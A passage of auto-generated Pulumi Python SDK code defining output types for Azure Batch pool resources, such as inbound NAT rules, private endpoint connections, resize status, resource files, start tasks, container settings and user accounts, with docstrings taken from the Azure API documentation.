pulumi.set(__self__, "access", access)
pulumi.set(__self__, "priority", priority)
pulumi.set(__self__, "source_address_prefix", source_address_prefix)
if source_port_ranges is not None:
pulumi.set(__self__, "source_port_ranges", source_port_ranges)
@property
@pulumi.getter
def access(self) -> str:
return pulumi.get(self, "access")
@property
@pulumi.getter
def priority(self) -> int:
"""
Priorities within a pool must be unique and are evaluated in order of priority. The lower the number the higher the priority. For example, rules could be specified with order numbers of 150, 250, and 350. The rule with the order number of 150 takes precedence over the rule that has an order of 250. Allowed priorities are 150 to 4096. If any reserved or duplicate values are provided the request fails with HTTP status code 400.
"""
return pulumi.get(self, "priority")
@property
@pulumi.getter(name="sourceAddressPrefix")
def source_address_prefix(self) -> str:
"""
Valid values are a single IP address (i.e. 10.10.10.10), IP subnet (i.e. 192.168.1.0/24), default tag, or * (for all addresses). If any other values are provided the request fails with HTTP status code 400.
"""
return pulumi.get(self, "source_address_prefix")
@property
@pulumi.getter(name="sourcePortRanges")
def source_port_ranges(self) -> Optional[Sequence[str]]:
"""
Valid values are '*' (for all ports 0 - 65535) or arrays of ports or port ranges (i.e. 100-200). The ports should in the range of 0 to 65535 and the port ranges or ports can't overlap. If any other values are provided the request fails with HTTP status code 400. Default value will be *.
"""
return pulumi.get(self, "source_port_ranges")
@pulumi.output_type
class NodePlacementConfigurationResponse(dict):
"""
Allocation configuration used by Batch Service to provision the nodes.
"""
def __init__(__self__, *,
policy: Optional[str] = None):
"""
Allocation configuration used by Batch Service to provision the nodes.
:param str policy: Allocation policy used by Batch Service to provision the nodes. If not specified, Batch will use the regional policy.
"""
if policy is not None:
pulumi.set(__self__, "policy", policy)
@property
@pulumi.getter
def policy(self) -> Optional[str]:
"""
Allocation policy used by Batch Service to provision the nodes. If not specified, Batch will use the regional policy.
"""
return pulumi.get(self, "policy")
@pulumi.output_type
class PoolEndpointConfigurationResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "inboundNatPools":
suggest = "inbound_nat_pools"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in PoolEndpointConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
PoolEndpointConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
PoolEndpointConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
inbound_nat_pools: Sequence['outputs.InboundNatPoolResponse']):
"""
:param Sequence['InboundNatPoolResponse'] inbound_nat_pools: The maximum number of inbound NAT pools per Batch pool is 5. If the maximum number of inbound NAT pools is exceeded the request fails with HTTP status code 400. This cannot be specified if the IPAddressProvisioningType is NoPublicIPAddresses.
"""
pulumi.set(__self__, "inbound_nat_pools", inbound_nat_pools)
@property
@pulumi.getter(name="inboundNatPools")
def inbound_nat_pools(self) -> Sequence['outputs.InboundNatPoolResponse']:
"""
The maximum number of inbound NAT pools per Batch pool is 5. If the maximum number of inbound NAT pools is exceeded the request fails with HTTP status code 400. This cannot be specified if the IPAddressProvisioningType is NoPublicIPAddresses.
"""
return pulumi.get(self, "inbound_nat_pools")
@pulumi.output_type
class PrivateEndpointConnectionResponse(dict):
"""
Contains information about a private link resource.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "provisioningState":
suggest = "provisioning_state"
elif key == "privateEndpoint":
suggest = "private_endpoint"
elif key == "privateLinkServiceConnectionState":
suggest = "private_link_service_connection_state"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in PrivateEndpointConnectionResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
PrivateEndpointConnectionResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
PrivateEndpointConnectionResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
etag: str,
id: str,
name: str,
provisioning_state: str,
type: str,
private_endpoint: Optional['outputs.PrivateEndpointResponse'] = None,
private_link_service_connection_state: Optional['outputs.PrivateLinkServiceConnectionStateResponse'] = None):
"""
Contains information about a private link resource.
:param str etag: The ETag of the resource, used for concurrency statements.
:param str id: The ID of the resource.
:param str name: The name of the resource.
:param str type: The type of the resource.
:param 'PrivateEndpointResponse' private_endpoint: The private endpoint of the private endpoint connection.
:param 'PrivateLinkServiceConnectionStateResponse' private_link_service_connection_state: The private link service connection state of the private endpoint connection
"""
pulumi.set(__self__, "etag", etag)
pulumi.set(__self__, "id", id)
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "provisioning_state", provisioning_state)
pulumi.set(__self__, "type", type)
if private_endpoint is not None:
pulumi.set(__self__, "private_endpoint", private_endpoint)
if private_link_service_connection_state is not None:
pulumi.set(__self__, "private_link_service_connection_state", private_link_service_connection_state)
@property
@pulumi.getter
def etag(self) -> str:
"""
The ETag of the resource, used for concurrency statements.
"""
return pulumi.get(self, "etag")
@property
@pulumi.getter
def id(self) -> str:
"""
The ID of the resource.
"""
return pulumi.get(self, "id")
@property
@pulumi.getter
def name(self) -> str:
"""
The name of the resource.
"""
return pulumi.get(self, "name")
@property
@pulumi.getter(name="provisioningState")
def provisioning_state(self) -> str:
return pulumi.get(self, "provisioning_state")
@property
@pulumi.getter
def type(self) -> str:
"""
The type of the resource.
"""
return pulumi.get(self, "type")
@property
@pulumi.getter(name="privateEndpoint")
def private_endpoint(self) -> Optional['outputs.PrivateEndpointResponse']:
"""
The private endpoint of the private endpoint connection.
"""
return pulumi.get(self, "private_endpoint")
@property
@pulumi.getter(name="privateLinkServiceConnectionState")
def private_link_service_connection_state(self) -> Optional['outputs.PrivateLinkServiceConnectionStateResponse']:
"""
The private link service connection state of the private endpoint connection
"""
return pulumi.get(self, "private_link_service_connection_state")
@pulumi.output_type
class PrivateEndpointResponse(dict):
"""
The private endpoint of the private endpoint connection.
"""
def __init__(__self__, *,
id: str):
"""
The private endpoint of the private endpoint connection.
"""
pulumi.set(__self__, "id", id)
@property
@pulumi.getter
def id(self) -> str:
return pulumi.get(self, "id")
@pulumi.output_type
class PrivateLinkServiceConnectionStateResponse(dict):
"""
The private link service connection state of the private endpoint connection
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "actionRequired":
suggest = "action_required"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in PrivateLinkServiceConnectionStateResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
PrivateLinkServiceConnectionStateResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
PrivateLinkServiceConnectionStateResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
action_required: str,
status: str,
description: Optional[str] = None):
"""
The private link service connection state of the private endpoint connection
"""
pulumi.set(__self__, "action_required", action_required)
pulumi.set(__self__, "status", status)
if description is not None:
pulumi.set(__self__, "description", description)
@property
@pulumi.getter(name="actionRequired")
def action_required(self) -> str:
return pulumi.get(self, "action_required")
@property
@pulumi.getter
def status(self) -> str:
return pulumi.get(self, "status")
@property
@pulumi.getter
def description(self) -> Optional[str]:
return pulumi.get(self, "description")
@pulumi.output_type
class PublicIPAddressConfigurationResponse(dict):
"""
The public IP Address configuration of the networking configuration of a Pool.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "ipAddressIds":
suggest = "ip_address_ids"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in PublicIPAddressConfigurationResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
PublicIPAddressConfigurationResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
PublicIPAddressConfigurationResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
ip_address_ids: Optional[Sequence[str]] = None,
provision: Optional[str] = None):
"""
The public IP Address configuration of the networking configuration of a Pool.
:param Sequence[str] ip_address_ids: The number of IPs specified here limits the maximum size of the Pool - 100 dedicated nodes or 100 low-priority nodes can be allocated for each public IP. For example, a pool needing 250 dedicated VMs would need at least 3 public IPs specified. Each element of this collection is of the form: /subscriptions/{subscription}/resourceGroups/{group}/providers/Microsoft.Network/publicIPAddresses/{ip}.
:param str provision: The default value is BatchManaged
"""
if ip_address_ids is not None:
pulumi.set(__self__, "ip_address_ids", ip_address_ids)
if provision is not None:
pulumi.set(__self__, "provision", provision)
@property
@pulumi.getter(name="ipAddressIds")
def ip_address_ids(self) -> Optional[Sequence[str]]:
"""
The number of IPs specified here limits the maximum size of the Pool - 100 dedicated nodes or 100 low-priority nodes can be allocated for each public IP. For example, a pool needing 250 dedicated VMs would need at least 3 public IPs specified. Each element of this collection is of the form: /subscriptions/{subscription}/resourceGroups/{group}/providers/Microsoft.Network/publicIPAddresses/{ip}.
"""
return pulumi.get(self, "ip_address_ids")
@property
@pulumi.getter
def provision(self) -> Optional[str]:
"""
The default value is BatchManaged
"""
return pulumi.get(self, "provision")
@pulumi.output_type
class ResizeErrorResponse(dict):
def __init__(__self__, *,
code: str,
message: str,
details: Optional[Sequence['outputs.ResizeErrorResponse']] = None):
"""
:param str code: An identifier for the error. Codes are invariant and are intended to be consumed programmatically.
:param str message: A message describing the error, intended to be suitable for display in a user interface.
"""
pulumi.set(__self__, "code", code)
pulumi.set(__self__, "message", message)
if details is not None:
pulumi.set(__self__, "details", details)
@property
@pulumi.getter
def code(self) -> str:
"""
An identifier for the error. Codes are invariant and are intended to be consumed programmatically.
"""
return pulumi.get(self, "code")
@property
@pulumi.getter
def message(self) -> str:
"""
A message describing the error, intended to be suitable for display in a user interface.
"""
return pulumi.get(self, "message")
@property
@pulumi.getter
def details(self) -> Optional[Sequence['outputs.ResizeErrorResponse']]:
return pulumi.get(self, "details")
@pulumi.output_type
class ResizeOperationStatusResponse(dict):
"""
Describes either the current operation (if the pool AllocationState is Resizing) or the previously completed operation (if the AllocationState is Steady).
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "nodeDeallocationOption":
suggest = "node_deallocation_option"
elif key == "resizeTimeout":
suggest = "resize_timeout"
elif key == "startTime":
suggest = "start_time"
elif key == "targetDedicatedNodes":
suggest = "target_dedicated_nodes"
elif key == "targetLowPriorityNodes":
suggest = "target_low_priority_nodes"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ResizeOperationStatusResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ResizeOperationStatusResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ResizeOperationStatusResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
errors: Optional[Sequence['outputs.ResizeErrorResponse']] = None,
node_deallocation_option: Optional[str] = None,
resize_timeout: Optional[str] = None,
start_time: Optional[str] = None,
target_dedicated_nodes: Optional[int] = None,
target_low_priority_nodes: Optional[int] = None):
"""
Describes either the current operation (if the pool AllocationState is Resizing) or the previously completed operation (if the AllocationState is Steady).
:param Sequence['ResizeErrorResponse'] errors: This property is set only if an error occurred during the last pool resize, and only when the pool allocationState is Steady.
:param str node_deallocation_option: The default value is requeue.
:param str resize_timeout: The default value is 15 minutes. The minimum value is 5 minutes. If you specify a value less than 5 minutes, the Batch service returns an error; if you are calling the REST API directly, the HTTP status code is 400 (Bad Request).
"""
if errors is not None:
pulumi.set(__self__, "errors", errors)
if node_deallocation_option is not None:
pulumi.set(__self__, "node_deallocation_option", node_deallocation_option)
if resize_timeout is not None:
pulumi.set(__self__, "resize_timeout", resize_timeout)
if start_time is not None:
pulumi.set(__self__, "start_time", start_time)
if target_dedicated_nodes is not None:
pulumi.set(__self__, "target_dedicated_nodes", target_dedicated_nodes)
if target_low_priority_nodes is not None:
pulumi.set(__self__, "target_low_priority_nodes", target_low_priority_nodes)
@property
@pulumi.getter
def errors(self) -> Optional[Sequence['outputs.ResizeErrorResponse']]:
"""
This property is set only if an error occurred during the last pool resize, and only when the pool allocationState is Steady.
"""
return pulumi.get(self, "errors")
@property
@pulumi.getter(name="nodeDeallocationOption")
def node_deallocation_option(self) -> Optional[str]:
"""
The default value is requeue.
"""
return pulumi.get(self, "node_deallocation_option")
@property
@pulumi.getter(name="resizeTimeout")
def resize_timeout(self) -> Optional[str]:
"""
The default value is 15 minutes. The minimum value is 5 minutes. If you specify a value less than 5 minutes, the Batch service returns an error; if you are calling the REST API directly, the HTTP status code is 400 (Bad Request).
"""
return pulumi.get(self, "resize_timeout")
@property
@pulumi.getter(name="startTime")
def start_time(self) -> Optional[str]:
return pulumi.get(self, "start_time")
@property
@pulumi.getter(name="targetDedicatedNodes")
def target_dedicated_nodes(self) -> Optional[int]:
return pulumi.get(self, "target_dedicated_nodes")
@property
@pulumi.getter(name="targetLowPriorityNodes")
def target_low_priority_nodes(self) -> Optional[int]:
return pulumi.get(self, "target_low_priority_nodes")
@pulumi.output_type
class ResourceFileResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "autoStorageContainerName":
suggest = "auto_storage_container_name"
elif key == "blobPrefix":
suggest = "blob_prefix"
elif key == "fileMode":
suggest = "file_mode"
elif key == "filePath":
suggest = "file_path"
elif key == "httpUrl":
suggest = "http_url"
elif key == "storageContainerUrl":
suggest = "storage_container_url"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ResourceFileResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ResourceFileResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ResourceFileResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
auto_storage_container_name: Optional[str] = None,
blob_prefix: Optional[str] = None,
file_mode: Optional[str] = None,
file_path: Optional[str] = None,
http_url: Optional[str] = None,
storage_container_url: Optional[str] = None):
"""
:param str auto_storage_container_name: The autoStorageContainerName, storageContainerUrl and httpUrl properties are mutually exclusive and one of them must be specified.
:param str blob_prefix: The property is valid only when autoStorageContainerName or storageContainerUrl is used. This prefix can be a partial filename or a subdirectory. If a prefix is not specified, all the files in the container will be downloaded.
:param str file_mode: This property applies only to files being downloaded to Linux compute nodes. It will be ignored if it is specified for a resourceFile which will be downloaded to a Windows node. If this property is not specified for a Linux node, then a default value of 0770 is applied to the file.
:param str file_path: If the httpUrl property is specified, the filePath is required and describes the path which the file will be downloaded to, including the filename. Otherwise, if the autoStorageContainerName or storageContainerUrl property is specified, filePath is optional and is the directory to download the files to. In the case where filePath is used as a directory, any directory structure already associated with the input data will be retained in full and appended to the specified filePath directory. The specified relative path cannot break out of the task's working directory (for example by using '..').
:param str http_url: The autoStorageContainerName, storageContainerUrl and httpUrl properties are mutually exclusive and one of them must be specified. If the URL is Azure Blob Storage, it must be readable using anonymous access; that is, the Batch service does not present any credentials when downloading the blob. There are two ways to get such a URL for a blob in Azure storage: include a Shared Access Signature (SAS) granting read permissions on the blob, or set the ACL for the blob or its container to allow public access.
:param str storage_container_url: The autoStorageContainerName, storageContainerUrl and httpUrl properties are mutually exclusive and one of them must be specified. This URL must be readable and listable using anonymous access; that is, the Batch service does not present any credentials when downloading the blob. There are two ways to get such a URL for a blob in Azure storage: include a Shared Access Signature (SAS) granting read and list permissions on the blob, or set the ACL for the blob or its container to allow public access.
"""
if auto_storage_container_name is not None:
pulumi.set(__self__, "auto_storage_container_name", auto_storage_container_name)
if blob_prefix is not None:
pulumi.set(__self__, "blob_prefix", blob_prefix)
if file_mode is not None:
pulumi.set(__self__, "file_mode", file_mode)
if file_path is not None:
pulumi.set(__self__, "file_path", file_path)
if http_url is not None:
pulumi.set(__self__, "http_url", http_url)
if storage_container_url is not None:
pulumi.set(__self__, "storage_container_url", storage_container_url)
@property
@pulumi.getter(name="autoStorageContainerName")
def auto_storage_container_name(self) -> Optional[str]:
"""
The autoStorageContainerName, storageContainerUrl and httpUrl properties are mutually exclusive and one of them must be specified.
"""
return pulumi.get(self, "auto_storage_container_name")
@property
@pulumi.getter(name="blobPrefix")
def blob_prefix(self) -> Optional[str]:
"""
The property is valid only when autoStorageContainerName or storageContainerUrl is used. This prefix can be a partial filename or a subdirectory. If a prefix is not specified, all the files in the container will be downloaded.
"""
return pulumi.get(self, "blob_prefix")
@property
@pulumi.getter(name="fileMode")
def file_mode(self) -> Optional[str]:
"""
This property applies only to files being downloaded to Linux compute nodes. It will be ignored if it is specified for a resourceFile which will be downloaded to a Windows node. If this property is not specified for a Linux node, then a default value of 0770 is applied to the file.
"""
return pulumi.get(self, "file_mode")
@property
@pulumi.getter(name="filePath")
def file_path(self) -> Optional[str]:
"""
If the httpUrl property is specified, the filePath is required and describes the path which the file will be downloaded to, including the filename. Otherwise, if the autoStorageContainerName or storageContainerUrl property is specified, filePath is optional and is the directory to download the files to. In the case where filePath is used as a directory, any directory structure already associated with the input data will be retained in full and appended to the specified filePath directory. The specified relative path cannot break out of the task's working directory (for example by using '..').
"""
return pulumi.get(self, "file_path")
@property
@pulumi.getter(name="httpUrl")
def http_url(self) -> Optional[str]:
"""
The autoStorageContainerName, storageContainerUrl and httpUrl properties are mutually exclusive and one of them must be specified. If the URL is Azure Blob Storage, it must be readable using anonymous access; that is, the Batch service does not present any credentials when downloading the blob. There are two ways to get such a URL for a blob in Azure storage: include a Shared Access Signature (SAS) granting read permissions on the blob, or set the ACL for the blob or its container to allow public access.
"""
return pulumi.get(self, "http_url")
@property
@pulumi.getter(name="storageContainerUrl")
def storage_container_url(self) -> Optional[str]:
"""
The autoStorageContainerName, storageContainerUrl and httpUrl properties are mutually exclusive and one of them must be specified. This URL must be readable and listable using anonymous access; that is, the Batch service does not present any credentials when downloading the blob. There are two ways to get such a URL for a blob in Azure storage: include a Shared Access Signature (SAS) granting read and list permissions on the blob, or set the ACL for the blob or its container to allow public access.
"""
return pulumi.get(self, "storage_container_url")
@pulumi.output_type
class ScaleSettingsResponse(dict):
"""
Defines the desired size of the pool. This can either be 'fixedScale' where the requested targetDedicatedNodes is specified, or 'autoScale' which defines a formula which is periodically reevaluated. If this property is not specified, the pool will have a fixed scale with 0 targetDedicatedNodes.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "autoScale":
suggest = "auto_scale"
elif key == "fixedScale":
suggest = "fixed_scale"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in ScaleSettingsResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
ScaleSettingsResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
ScaleSettingsResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
auto_scale: Optional['outputs.AutoScaleSettingsResponse'] = None,
fixed_scale: Optional['outputs.FixedScaleSettingsResponse'] = None):
"""
Defines the desired size of the pool. This can either be 'fixedScale' where the requested targetDedicatedNodes is specified, or 'autoScale' which defines a formula which is periodically reevaluated. If this property is not specified, the pool will have a fixed scale with 0 targetDedicatedNodes.
:param 'AutoScaleSettingsResponse' auto_scale: This property and fixedScale are mutually exclusive and one of the properties must be specified.
:param 'FixedScaleSettingsResponse' fixed_scale: This property and autoScale are mutually exclusive and one of the properties must be specified.
"""
if auto_scale is not None:
pulumi.set(__self__, "auto_scale", auto_scale)
if fixed_scale is not None:
pulumi.set(__self__, "fixed_scale", fixed_scale)
@property
@pulumi.getter(name="autoScale")
def auto_scale(self) -> Optional['outputs.AutoScaleSettingsResponse']:
"""
This property and fixedScale are mutually exclusive and one of the properties must be specified.
"""
return pulumi.get(self, "auto_scale")
@property
@pulumi.getter(name="fixedScale")
def fixed_scale(self) -> Optional['outputs.FixedScaleSettingsResponse']:
"""
This property and autoScale are mutually exclusive and one of the properties must be specified.
"""
return pulumi.get(self, "fixed_scale")
@pulumi.output_type
class StartTaskResponse(dict):
"""
In some cases the start task may be re-run even though the node was not rebooted. Due to this, start tasks should be idempotent and exit gracefully if the setup they're performing has already been done. Special care should be taken to avoid start tasks which create breakaway process or install/launch services from the start task working directory, as this will block Batch from being able to re-run the start task.
"""
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "commandLine":
suggest = "command_line"
elif key == "containerSettings":
suggest = "container_settings"
elif key == "environmentSettings":
suggest = "environment_settings"
elif key == "maxTaskRetryCount":
suggest = "max_task_retry_count"
elif key == "resourceFiles":
suggest = "resource_files"
elif key == "userIdentity":
suggest = "user_identity"
elif key == "waitForSuccess":
suggest = "wait_for_success"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in StartTaskResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
StartTaskResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
StartTaskResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
command_line: Optional[str] = None,
container_settings: Optional['outputs.TaskContainerSettingsResponse'] = None,
environment_settings: Optional[Sequence['outputs.EnvironmentSettingResponse']] = None,
max_task_retry_count: Optional[int] = None,
resource_files: Optional[Sequence['outputs.ResourceFileResponse']] = None,
user_identity: Optional['outputs.UserIdentityResponse'] = None,
wait_for_success: Optional[bool] = None):
"""
In some cases the start task may be re-run even though the node was not rebooted. Due to this, start tasks should be idempotent and exit gracefully if the setup they're performing has already been done. Special care should be taken to avoid start tasks which create breakaway process or install/launch services from the start task working directory, as this will block Batch from being able to re-run the start task.
:param str command_line: The command line does not run under a shell, and therefore cannot take advantage of shell features such as environment variable expansion. If you want to take advantage of such features, you should invoke the shell in the command line, for example using "cmd /c MyCommand" in Windows or "/bin/sh -c MyCommand" in Linux. Required if any other properties of the startTask are specified.
:param 'TaskContainerSettingsResponse' container_settings: When this is specified, all directories recursively below the AZ_BATCH_NODE_ROOT_DIR (the root of Azure Batch directories on the node) are mapped into the container, all task environment variables are mapped into the container, and the task command line is executed in the container.
:param int max_task_retry_count: The Batch service retries a task if its exit code is nonzero. Note that this value specifically controls the number of retries. The Batch service will try the task once, and may then retry up to this limit. For example, if the maximum retry count is 3, Batch tries the task up to 4 times (one initial try and 3 retries). If the maximum retry count is 0, the Batch service does not retry the task. If the maximum retry count is -1, the Batch service retries the task without limit.
:param 'UserIdentityResponse' user_identity: If omitted, the task runs as a non-administrative user unique to the task.
:param bool wait_for_success: If true and the start task fails on a compute node, the Batch service retries the start task up to its maximum retry count (maxTaskRetryCount). If the task has still not completed successfully after all retries, then the Batch service marks the compute node unusable, and will not schedule tasks to it. This condition can be detected via the node state and scheduling error detail. If false, the Batch service will not wait for the start task to complete. In this case, other tasks can start executing on the compute node while the start task is still running; and even if the start task fails, new tasks will continue to be scheduled on the node. The default is true.
"""
if command_line is not None:
pulumi.set(__self__, "command_line", command_line)
if container_settings is not None:
pulumi.set(__self__, "container_settings", container_settings)
if environment_settings is not None:
pulumi.set(__self__, "environment_settings", environment_settings)
if max_task_retry_count is not None:
pulumi.set(__self__, "max_task_retry_count", max_task_retry_count)
if resource_files is not None:
pulumi.set(__self__, "resource_files", resource_files)
if user_identity is not None:
pulumi.set(__self__, "user_identity", user_identity)
if wait_for_success is not None:
pulumi.set(__self__, "wait_for_success", wait_for_success)
@property
@pulumi.getter(name="commandLine")
def command_line(self) -> Optional[str]:
"""
The command line does not run under a shell, and therefore cannot take advantage of shell features such as environment variable expansion. If you want to take advantage of such features, you should invoke the shell in the command line, for example using "cmd /c MyCommand" in Windows or "/bin/sh -c MyCommand" in Linux. Required if any other properties of the startTask are specified.
"""
return pulumi.get(self, "command_line")
@property
@pulumi.getter(name="containerSettings")
def container_settings(self) -> Optional['outputs.TaskContainerSettingsResponse']:
"""
When this is specified, all directories recursively below the AZ_BATCH_NODE_ROOT_DIR (the root of Azure Batch directories on the node) are mapped into the container, all task environment variables are mapped into the container, and the task command line is executed in the container.
"""
return pulumi.get(self, "container_settings")
@property
@pulumi.getter(name="environmentSettings")
def environment_settings(self) -> Optional[Sequence['outputs.EnvironmentSettingResponse']]:
return pulumi.get(self, "environment_settings")
@property
@pulumi.getter(name="maxTaskRetryCount")
def max_task_retry_count(self) -> Optional[int]:
"""
The Batch service retries a task if its exit code is nonzero. Note that this value specifically controls the number of retries. The Batch service will try the task once, and may then retry up to this limit. For example, if the maximum retry count is 3, Batch tries the task up to 4 times (one initial try and 3 retries). If the maximum retry count is 0, the Batch service does not retry the task. If the maximum retry count is -1, the Batch service retries the task without limit.
"""
return pulumi.get(self, "max_task_retry_count")
@property
@pulumi.getter(name="resourceFiles")
def resource_files(self) -> Optional[Sequence['outputs.ResourceFileResponse']]:
return pulumi.get(self, "resource_files")
@property
@pulumi.getter(name="userIdentity")
def user_identity(self) -> Optional['outputs.UserIdentityResponse']:
"""
If omitted, the task runs as a non-administrative user unique to the task.
"""
return pulumi.get(self, "user_identity")
@property
@pulumi.getter(name="waitForSuccess")
def wait_for_success(self) -> Optional[bool]:
"""
If true and the start task fails on a compute node, the Batch service retries the start task up to its maximum retry count (maxTaskRetryCount). If the task has still not completed successfully after all retries, then the Batch service marks the compute node unusable, and will not schedule tasks to it. This condition can be detected via the node state and scheduling error detail. If false, the Batch service will not wait for the start task to complete. In this case, other tasks can start executing on the compute node while the start task is still running; and even if the start task fails, new tasks will continue to be scheduled on the node. The default is true.
"""
return pulumi.get(self, "wait_for_success")
@pulumi.output_type
class TaskContainerSettingsResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "imageName":
suggest = "image_name"
elif key == "containerRunOptions":
suggest = "container_run_options"
elif key == "workingDirectory":
suggest = "working_directory"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in TaskContainerSettingsResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
TaskContainerSettingsResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
TaskContainerSettingsResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
image_name: str,
container_run_options: Optional[str] = None,
registry: Optional['outputs.ContainerRegistryResponse'] = None,
working_directory: Optional[str] = None):
"""
:param str image_name: This is the full image reference, as would be specified to "docker pull". If no tag is provided as part of the image name, the tag ":latest" is used as a default.
:param str container_run_options: These additional options are supplied as arguments to the "docker create" command, in addition to those controlled by the Batch Service.
:param 'ContainerRegistryResponse' registry: This setting can be omitted if was already provided at pool creation.
"""
pulumi.set(__self__, "image_name", image_name)
if container_run_options is not None:
pulumi.set(__self__, "container_run_options", container_run_options)
if registry is not None:
pulumi.set(__self__, "registry", registry)
if working_directory is not None:
pulumi.set(__self__, "working_directory", working_directory)
@property
@pulumi.getter(name="imageName")
def image_name(self) -> str:
"""
This is the full image reference, as would be specified to "docker pull". If no tag is provided as part of the image name, the tag ":latest" is used as a default.
"""
return pulumi.get(self, "image_name")
@property
@pulumi.getter(name="containerRunOptions")
def container_run_options(self) -> Optional[str]:
"""
These additional options are supplied as arguments to the "docker create" command, in addition to those controlled by the Batch Service.
"""
return pulumi.get(self, "container_run_options")
@property
@pulumi.getter
def registry(self) -> Optional['outputs.ContainerRegistryResponse']:
"""
This setting can be omitted if was already provided at pool creation.
"""
return pulumi.get(self, "registry")
@property
@pulumi.getter(name="workingDirectory")
def working_directory(self) -> Optional[str]:
return pulumi.get(self, "working_directory")
@pulumi.output_type
class TaskSchedulingPolicyResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "nodeFillType":
suggest = "node_fill_type"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in TaskSchedulingPolicyResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
TaskSchedulingPolicyResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
TaskSchedulingPolicyResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
node_fill_type: str):
pulumi.set(__self__, "node_fill_type", node_fill_type)
@property
@pulumi.getter(name="nodeFillType")
def node_fill_type(self) -> str:
return pulumi.get(self, "node_fill_type")
@pulumi.output_type
class UserAccountResponse(dict):
@staticmethod
def __key_warning(key: str):
suggest = None
if key == "elevationLevel":
suggest = "elevation_level"
elif key == "linuxUserConfiguration":
suggest = "linux_user_configuration"
elif key == "windowsUserConfiguration":
suggest = "windows_user_configuration"
if suggest:
pulumi.log.warn(f"Key '{key}' not found in UserAccountResponse. Access the value via the '{suggest}' property getter instead.")
def __getitem__(self, key: str) -> Any:
UserAccountResponse.__key_warning(key)
return super().__getitem__(key)
def get(self, key: str, default = None) -> Any:
UserAccountResponse.__key_warning(key)
return super().get(key, default)
def __init__(__self__, *,
name: str,
password: str,
elevation_level: Optional[str] = None,
linux_user_configuration: Optional['outputs.LinuxUserConfigurationResponse'] = None,
windows_user_configuration: Optional['outputs.WindowsUserConfigurationResponse'] = None):
"""
:param str elevation_level: nonAdmin - The auto user is a standard user without elevated access. admin - The auto user is a user with elevated access and operates with full Administrator permissions. The default value is nonAdmin.
:param 'LinuxUserConfigurationResponse' linux_user_configuration: This property is ignored if specified on a Windows pool. If not specified, the user is created with the default options.
:param 'WindowsUserConfigurationResponse' windows_user_configuration: This property can only be specified if the user is on a Windows pool. If not specified and on a Windows pool, the user is created with the default options.
"""
pulumi.set(__self__, "name", name)
pulumi.set(__self__, "password", password)
if elevation_level is not None:
pulumi.set(__self__, "elevation_level", elevation_level)
if linux_user_configuration is not None:
pulumi.set(__self__, "linux_user_configuration", linux_user_configuration)
if windows_user_configuration is not None:
pulumi.set(__self__, "windows_user_configuration", windows_user_configuration)
@property
@pulumi.getter
def name(self) -> str:
return pulumi.get(self, "name")
@property
@pulumi.getter
def password(self) -> str:
return pulumi.get(self, "password")
@property
@pulumi.getter(name="elevationLevel")
def elevation_level(self) -> Optional[str]:
"""
nonAdmin - The auto user is a standard user without elevated access. admin - The auto user is a user with elevated access and operates with full Administrator permissions. The default value is nonAdmin.
"""
return pulumi.get(self, "elevation_level")
@property
@pulumi.getter(name="linuxUserConfiguration")
def linux_user_configuration(self) -> Optional['outputs.LinuxUserConfigurationResponse']:
